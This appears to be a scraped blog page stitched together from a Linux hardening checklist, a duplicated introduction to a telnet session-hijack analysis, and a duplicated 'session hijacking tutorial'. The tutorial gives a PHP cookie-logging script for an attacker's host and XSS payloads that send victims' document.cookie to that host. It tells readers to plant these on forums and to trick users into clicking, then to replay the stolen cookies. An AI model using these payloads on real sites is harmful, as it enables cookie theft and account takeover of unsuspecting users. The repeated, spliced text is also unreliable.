1. System startup and shutdown events (reboot / halt).
2. Date and time of the event.
3. User respoisble for the event (such as trying to access /path/to/topsecret.dat file).
4. Type of event (edit, access, delete, write, update file & commands).
5. Success or failure of the event.
6. Records events that Modify date and time.
7. Find out who made changes to modify the system's network settings.
8. Record events that modify user/group information.
9. See who made changes to a file etc.
See our quick tutorial which explains enabling and using the auditd service.
#18: Secure OpenSSH Server
The SSH protocol is recommended for remote login and remote file transfer. However, ssh is open to many attacks. See how to secure OpenSSH server:
* Top 20 OpenSSH Server Best Security Practices.
#19: Install And Use Intrusion Detection System
A network intrusion detection system (NIDS) is an intrusion detection system that tries to detect malicious activity such as denial of service attacks, port scans or even attempts to crack into computers by monitoring network traffic.
It is a good practice to deploy any integrity checking software before system goes online in a production environment. If possible install AIDE software before the system is connected to any network. AIDE is a host-based intrusion detection system (HIDS) it can monitor and analyses the internals of a computing system.
Snort is a software for intrusion detection which is capable of performing packet logging and real-time traffic analysis on IP networks.
#20: Protecting Files, Directories and Email
Linux offers excellent protections against unauthorized data access. File permissions and MAC prevent unauthorized access from accessing data. However, permissions set by the Linux are irrelevant if an attacker has physical access to a computer and can simply move the computer's hard drive to another system to copy and analyze the sensitive data. You can easily protect files, and partitons under Linux using the following tools:
* To encrypt and decrypt files with a password, use gpg command.
* Linux or UNIX password protect files with openssl and other tools.
* See how to encrypting directories with ecryptfs.
* TrueCrypt is free open-source disk encryption software for Windows 7/Vista/XP, Mac OS X and Linux.
* Howto: Disk and partition encryption in Linux for mobile devices.
* How to setup encrypted Swap on Linux.
#20.1: Securing Email Servers
You can use SSL certificates and gpg keys to secure email communication on both server and client computers:
"I want to change the world, but nobody gives me the source code"
Session Hijacking
[b]Analysis of a Telnet Session Hijack via Spoofed MAC Addresses and Session Resynchronization
Introduction
The TCP/IP protocol was design for a trusting environment and therefore has insufficient security
controls. Because of the design, a number of vulnerabilities exist in the telnet, which provides a remote
terminal session, and TCP/IP protocols that allow an attacker to hijack a telnet session, thus appearing to
be the original client to the server. Located on the Internet there are many tools that can automate
attacks on TCP/IP networks. For this analysis one of those tools, "hunt," will be used to hijack a telnet
session via spoofed MAC (Media Access Control) addresses and when the attacker has completed
issuing commands, he or she will restore the original telnet connection, through a resynchronization
process.
TCP, IP and MAC Addresses
Hosts that communicate using the TCP/IP protocol basically have the same network architecture as the
OSI network model, which has 7 layers. As the flow of data moves down the network stack a header is
added to the packet at each layer and then sent down to the next layer. When the packet reaches the
destination host the reverse takes place, the header is removed and the packet is passed up to the next
layer.
The important headers and their addresses for the analysis are TCP, IP, and MAC. At the Transport
layer, the TCP headers will contain the port number (address) of each host. The client will be assigned a
port number above 1023 (in the examples the port assigned is 1103) and the server’s port number will be
a predetermined number (telnet is being used and by convention resides at port number 23). At the
Network layer, each host will provide its 4-octet IP address in the header. In the examples the client is
10.0.0.154 and the server is 10.0.0.146. At the Data Link layer, a 6-octet Ethernet MAC address is added
to the destination and source fields. Every network card has a unique MAC address that is assigned by
the IEEE and manufacturer. In the examples the MAC address for the client is 00-50-04-AD-5E-63
Introduction
The TCP/IP protocol was design for a trusting environment and therefore has insufficient security
controls. Because of the design, a number of vulnerabilities exist in the telnet, which provides a remote
terminal session, and TCP/IP protocols that allow an attacker to hijack a telnet session, thus appearing to
be the original client to the server. Located on the Internet there are many tools that can automate
attacks on TCP/IP networks. For this analysis one of those tools, "hunt," will be used to hijack a telnet
session via spoofed MAC (Media Access Control) addresses and when the attacker has completed
issuing commands, he or she will restore the original telnet connection, through a resynchronization
process.
TCP, IP and MAC Addresses
Hosts that communicate using the TCP/IP protocol basically have the same network architecture as the
OSI network model, which has 7 layers. As the flow of data moves down the network stack a header is
added to the packet at each layer and then sent down to the next layer. When the packet reaches the
destination host the reverse takes place, the header is removed and the packet is passed up to the next
layer.
The important headers and their addresses for the analysis are TCP, IP, and MAC. At the Transport
layer, the TCP headers will contain the port number (address) of each host. The client will be assigned a
port number above 1023 (in the examples the port assigned is 1103) and the server’s port number will be
a predetermined number (telnet is being used and by convention resides at port number 23). At the
Network layer, each host will provide its 4-octet IP address in the header. In the examples the client is
10.0.0.154 and the server is 10.0.0.146. At the Data Link layer, a 6-octet Ethernet MAC address is added
to the destination and source fields. Every network card has a unique MAC address that is assigned by
the IEEE and manufacturer. In the examples the MAC address for the client is 00-50-04-AD-5E-63
SESSION HIJACKING TUTORIAL
Session hijacking is the process of exploiting valid computer session which involves stealing the victim's cookie.
so now,let's understand the below.
What is a cookie?
A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser.A cookie is sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back by the browser unchanged everytime it accesses the server.
A cookie has a expiration time that is set by the server and are deleted automatically after the expiration time.
Cookie is used to maintain users authentication and to implement shopping cart during his navigation,possibly across multiple visits.
What can we do after stealing cookie?
Well,as we know web sites authenticate their user's with a cookie,it can be used to hijack the victims session.The victims stolen cookie can be replaced with our cookie to hijack his session.
The following is a cookie stealing script which is to be stored in attacker's host.It recieves the cookie data and stores to a text file.
Save the script as a cookielogger.php in your server.(Any free web hosting sites like justfree,x10hosting etc..)
Also create an empty text file and name it as log.txt and upload it.
Now we come to the hardest part where we have to inject a piece of javascript into sites html page,which the victims has to visit.We should now look for a place to post the javascript.
Look for user interactive sites which contain comments or forums.
Post the following code which invokes or activates the cookielogger on your host.
Your can also trick the victim into clicking a link that activates javascript.
Below is the code which has to be posted.
Clicking an image also can activate the script.For this purpose you can use the below code.
All the details like cookie,ipaddress,browser of the victim are logged in to log.txt in your host.
In the above codes please remove the space in between javascript.
Hijacking the Session:
Now we have cookie,what to do with this..?
Download cookie editor mozilla plugin.
Go to the target site-->open cookie editor-->Replace the cookie with the stolen cookie of the victim and refresh the page.Thats it!!!you should now be in his account.
Download cookie editor mozilla plugin from here : https://addons.mozilla.org/en-US/firefox/addon/573
so now,let's understand the below.
What is a cookie?
A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser.A cookie is sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back by the browser unchanged everytime it accesses the server.
A cookie has a expiration time that is set by the server and are deleted automatically after the expiration time.
Cookie is used to maintain users authentication and to implement shopping cart during his navigation,possibly across multiple visits.
What can we do after stealing cookie?
Well,as we know web sites authenticate their user's with a cookie,it can be used to hijack the victims session.The victims stolen cookie can be replaced with our cookie to hijack his session.
The following is a cookie stealing script which is to be stored in attacker's host.It recieves the cookie data and stores to a text file.
PHP Code:
<?php
function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))$ip = $_SERVER['REMOTE_ADDR'];
else$ip = "unknown";
return($ip);
}
function logData()
{$ipLog="log.txt";$cookie = $_SERVER['QUERY_STRING'];$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();
$rem_port = $_SERVER['REMOTE_PORT'];$user_agent = $_SERVER['HTTP_USER_AGENT'];$rqst_method = $_SERVER['METHOD'];$rem_host = $_SERVER['REMOTE_HOST'];$referer = $_SERVER['HTTP_REFERER'];$date=date ("l dS of F Y h:i:s A");$log=fopen("$ipLog", "a+");
if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
");
elsefputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");fclose($log);
}
logData();
?>Save the script as a cookielogger.php in your server.(Any free web hosting sites like justfree,x10hosting etc..)
Also create an empty text file and name it as log.txt and upload it.
Now we come to the hardest part where we have to inject a piece of javascript into sites html page,which the victims has to visit.We should now look for a place to post the javascript.
Look for user interactive sites which contain comments or forums.
Post the following code which invokes or activates the cookielogger on your host.
Code:
<script language="Java script">
document.location="http://www.yourhost.com/cookielogger.php?cookie=" + document.cookie;
</script>Your can also trick the victim into clicking a link that activates javascript.
Below is the code which has to be posted.
Code:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;">Click here!</a>Clicking an image also can activate the script.For this purpose you can use the below code.
Code:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;">
<img src="URL OF THE IMAGE"/></a>All the details like cookie,ipaddress,browser of the victim are logged in to log.txt in your host.
In the above codes please remove the space in between javascript.
Hijacking the Session:
Now we have cookie,what to do with this..?
Download cookie editor mozilla plugin.
Go to the target site-->open cookie editor-->Replace the cookie with the stolen cookie of the victim and refresh the page.Thats it!!!you should now be in his account.
Download cookie editor mozilla plugin from here : https://addons.mozilla.org/en-US/firefox/addon/573
Subscribe to:
Posts (Atom)